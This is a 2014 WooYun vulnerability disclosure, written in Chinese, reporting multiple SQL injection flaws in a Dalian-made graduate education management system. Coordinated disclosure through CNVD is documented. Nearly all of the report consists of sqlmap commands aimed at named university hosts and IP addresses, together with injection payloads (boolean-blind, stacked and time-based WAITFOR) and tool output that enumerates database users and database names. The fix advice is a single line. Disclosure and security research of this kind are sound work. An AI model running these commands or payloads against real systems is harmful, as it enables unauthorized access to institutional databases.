当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060561

漏洞标题:某教育管理信息系统通用型多处SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: Mr.leo

提交时间:2014-05-15 15:06

修复时间:2014-08-13 15:08

公开时间:2014-08-13 15:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-15: 细节已通知厂商并且等待厂商处理中
2014-05-18: 厂商已经确认,细节仅向厂商公开
2014-05-21: 细节向第三方安全合作伙伴开放
2014-07-12: 细节向核心白帽子及相关领域专家公开
2014-07-22: 细节向普通白帽子公开
2014-08-01: 细节向实习白帽子公开
2014-08-13: 细节向公众公开

简要描述:

某教育管理信息系统通用型多处SQL注入漏洞

详细说明:

大连拓扑伟业科技有限公司 研究生教育管理信息系统,可查数据库表信息。
1、ID参数没有过滤,导致注射。
3个案例
Sqlmap -u "http://grsmis.sjzu.edu.cn/public/tutorshow.aspx?ID=00147&spec=6" --dbs --current-user --current-db
Sqlmap -u "http://202.118.83.94:85/public/tutorshow.aspx?ID=19851006&spec=59" --dbs --current-user --current-db
Sqlmap -u "http://202.199.155.6/dlugdmis/public/tutorshow.aspx?ID=040040&spec=6" --dbs --current-user --current-db
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=00147' AND 2469=2469 AND 'JOSw'='JOSw&spec=6
---
[17:06:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS
back-end DBMS: Microsoft SQL Server 2005
[17:06:03] [INFO] fetching current user
[17:06:03] [INFO] resumed: gsadmin
current user: 'gsadmin'
[17:06:03] [INFO] fetching current database
[17:06:03] [INFO] resumed: syjzgsDB
current database: 'syjzgsDB'
[17:06:03] [INFO] fetching database names
[17:06:03] [INFO] fetching number of databases
[17:06:03] [INFO] resumed: 6
[17:06:03] [INFO] resumed: master
[17:06:03] [INFO] resumed: model
[17:06:03] [INFO] resumed: msdb
[17:06:03] [INFO] resumed: syjzgsDB
[17:06:03] [INFO] resumed: temp
[17:06:03] [INFO] resumed: tempdb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] syjzgsDB
[*] temp
[*] tempdb

实例2:
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=19851006' AND 1794=1794 AND 'jayi'='jayi&spec=59
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=19851006' AND 1794=1794 AND 'jayi'='jayi&spec=59
---
current user: 'tpwy'
current database: 'tpwymis20100628'
available databases [18]:
[*] dlmuTest100603
[*] dmumis02
[*] dmumis0719
[*] dmumis20100511
[*] dxHelp
[*] HaTeam_Dd
[*] masper
[*] MisBak
[*] model
[*] msdb
[*] newmar
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] TPWY
[*] tpwymis20100628
[*] WYMIS
实例3:
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=040040 AND 8570=8570&spec=6
---
[15:19:17] [INFO] testing MySQL
[15:19:26] [WARNING] the back-end DBMS is not MySQL
[15:19:26] [INFO] testing Oracle
[15:19:35] [WARNING] the back-end DBMS is not Oracle
[15:19:35] [INFO] testing PostgreSQL
[15:19:44] [WARNING] the back-end DBMS is not PostgreSQL
[15:19:44] [INFO] testing Microsoft SQL Server
[15:19:54] [INFO] confirming Microsoft SQL Server
[15:20:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:20:23] [INFO] fetching current user
[15:20:23] [WARNING] running in a single-thread mode. Please consider usage of
ption '--threads' for faster data retrieval
[15:20:23] [INFO] retrieved: gsmis
current user: 'gsmis'
[15:26:56] [INFO] fetching current database
[15:26:56] [INFO] retrieved: dlu100318
current database: 'dlu100318'
[15:37:58] [INFO] fetching database names
[15:37:58] [INFO] fetching number of databases
[15:37:58] [INFO] retrieved: 7
[15:39:06] [INFO] retrieved: dlu100318
[15:50:06] [INFO] retrieved: master
[15:52:42] [INFO] retrieved: model
[15:53:02] [INFO] retrieved: msdb
[15:53:17] [INFO] retrieved: ReportServer
[15:53:56] [INFO] retrieved: ReportServerTempDB
[15:54:55] [INFO] retrieved: tempdb
available databases [7]:
[*] dlu100318
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
2、ID没有过滤,导致注射
3个实例证明
Sqlmap -u "http://grsmis.sjzu.edu.cn/public/tutorshow.aspx?ID=00147&spec=6" --dbs --current-user --current-db
Sqlmap -u "http://202.118.83.94:85/public/tutorshow.aspx?ID=19851006&spec=59" --dbs --current-user --current-db
Sqlmap -u "http://202.199.155.6/dlugdmis/public/tutorshow.aspx?ID=040040&spec=6" --dbs --current-user --current-db
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=00147' AND 2469=2469 AND 'JOSw'='JOSw&spec=6
---
[17:06:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS
back-end DBMS: Microsoft SQL Server 2005
[17:06:03] [INFO] fetching current user
[17:06:03] [INFO] resumed: gsadmin
current user: 'gsadmin'
[17:06:03] [INFO] fetching current database
[17:06:03] [INFO] resumed: syjzgsDB
current database: 'syjzgsDB'
[17:06:03] [INFO] fetching database names
[17:06:03] [INFO] fetching number of databases
[17:06:03] [INFO] resumed: 6
[17:06:03] [INFO] resumed: master
[17:06:03] [INFO] resumed: model
[17:06:03] [INFO] resumed: msdb
[17:06:03] [INFO] resumed: syjzgsDB
[17:06:03] [INFO] resumed: temp
[17:06:03] [INFO] resumed: tempdb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] syjzgsDB
[*] temp
[*] tempdb

实例2:
sqlmap identified the following injection points with a total of 66 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=19851006' AND 1794=1794 AND 'jayi'='jayi&spec=59
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=19851006' AND 1794=1794 AND 'jayi'='jayi&spec=59
---
current user: 'tpwy'
current database: 'tpwymis20100628'
available databases [18]:
[*] dlmuTest100603
[*] dmumis02
[*] dmumis0719
[*] dmumis20100511
[*] dxHelp
[*] HaTeam_Dd
[*] masper
[*] MisBak
[*] model
[*] msdb
[*] newmar
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] TPWY
[*] tpwymis20100628
[*] WYMIS
实例3:
Place: GET
Parameter: ID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ID=040040 AND 8570=8570&spec=6
---
[15:19:17] [INFO] testing MySQL
[15:19:26] [WARNING] the back-end DBMS is not MySQL
[15:19:26] [INFO] testing Oracle
[15:19:35] [WARNING] the back-end DBMS is not Oracle
[15:19:35] [INFO] testing PostgreSQL
[15:19:44] [WARNING] the back-end DBMS is not PostgreSQL
[15:19:44] [INFO] testing Microsoft SQL Server
[15:19:54] [INFO] confirming Microsoft SQL Server
[15:20:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:20:23] [INFO] fetching current user
[15:20:23] [WARNING] running in a single-thread mode. Please consider usage of
ption '--threads' for faster data retrieval
[15:20:23] [INFO] retrieved: gsmis
current user: 'gsmis'
[15:26:56] [INFO] fetching current database
[15:26:56] [INFO] retrieved: dlu100318
current database: 'dlu100318'
[15:37:58] [INFO] fetching database names
[15:37:58] [INFO] fetching number of databases
[15:37:58] [INFO] retrieved: 7
[15:39:06] [INFO] retrieved: dlu100318
[15:50:06] [INFO] retrieved: master
[15:52:42] [INFO] retrieved: model
[15:53:02] [INFO] retrieved: msdb
[15:53:17] [INFO] retrieved: ReportServer
[15:53:56] [INFO] retrieved: ReportServerTempDB
[15:54:55] [INFO] retrieved: tempdb
available databases [7]:
[*] dlu100318
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
3、id没有过滤,导致注射
http://grsmis.sjzu.edu.cn/public/subjectspeci.aspx?id=71&gl=2
http://202.118.83.94:85/public/subjectspeci.aspx?id=71&gl=2
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=71 AND 5561=5561&gl=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=71; WAITFOR DELAY '0:0:5';--&gl=2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=71 WAITFOR DELAY '0:0:5'--&gl=2
---
[18:20:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005
[18:20:14] [INFO] fetching current user
[18:20:14] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:20:14] [INFO] retrieved:
[18:20:15] [WARNING] reflective value(s) found and filtering out
gsadmin
current user: 'gsadmin'
[18:20:46] [INFO] fetching current database
[18:20:46] [INFO] retrieved: syjzgsDB
current database: 'syjzgsDB'
[18:21:19] [INFO] fetching database names
[18:21:19] [INFO] fetching number of databases
[18:21:19] [INFO] retrieved: 6
[18:21:22] [INFO] retrieved: master
[18:21:50] [INFO] retrieved: model
[18:22:12] [INFO] retrieved: msdb
[18:22:35] [INFO] retrieved: syjzgsDB
[18:23:19] [INFO] retrieved: temp
[18:23:44] [INFO] retrieved: tempdb
available databases [6]:
[*] master
[*] model
[*] msdb
[*] syjzgsDB
[*] temp
[*] tempdb

实例2:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=71 AND 2894=2894&gl=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=71; WAITFOR DELAY '0:0:5';--&gl=2
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=71 WAITFOR DELAY '0:0:5'--&gl=2
---
[18:21:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[18:21:05] [INFO] fetching current user
[18:21:05] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[18:21:05] [INFO] retrieved:
[18:21:06] [WARNING] reflective value(s) found and filtering out
tpwy
current user: 'tpwy'
[18:21:20] [INFO] fetching current database
[18:21:20] [INFO] retrieved: tpwymis20100628
current database: 'tpwymis20100628'
[18:22:07] [INFO] fetching database names
[18:22:07] [INFO] fetching number of databases
[18:22:07] [INFO] retrieved: 18
[18:22:11] [INFO] retrieved: dlmuTest100603
[18:23:02] [INFO] retrieved: dmumis02
[18:23:33] [INFO] retrieved: dmumis0719
[18:24:13] [INFO] retrieved: dmumis20100511
[18:25:12] [INFO] retrieved: bxHelp
[18:25:59] [INFO] retrieved: HaTeam_Dd
[18:26:38] [INFO] retrieved: master
[18:27:02] [INFO] retrieved: MisBak
[18:27:26] [INFO] retrieved: model
[18:27:47] [INFO] retrieved: msdb
[18:28:04] [INFO] retrieved: newmar
[18:28:29] [INFO] retrieved: ReportServer
[18:29:15] [INFO] retrieved: ReportServerTempDB
[18:30:23] [INFO] retrieved: tempdb
[18:30:49] [INFO] retrieved: test
[18:31:07] [INFO] retrieved: TPWY
[18:31:25] [INFO] retrieved: tpwymis20100628
[18:32:28] [INFO] retrieved: WYMIS
available databases [18]:
[*] bxHelp
[*] dlmuTest100603
[*] dmumis02
[*] dmumis0719
[*] dmumis20100511
[*] HaTeam_Dd
[*] master
[*] MisBak
[*] model
[*] msdb
[*] newmar
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] test
[*] TPWY
[*] tpwymis20100628
[*] WYMIS

漏洞证明:

已经证明

修复方案:

过滤多个参数

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-18 15:59

厂商回复:

CNVD确认并复现所述情况,由CNVD通过公开渠道联系软件生产厂商大连拓扑伟业科技有限公司处置。

最新状态:

暂无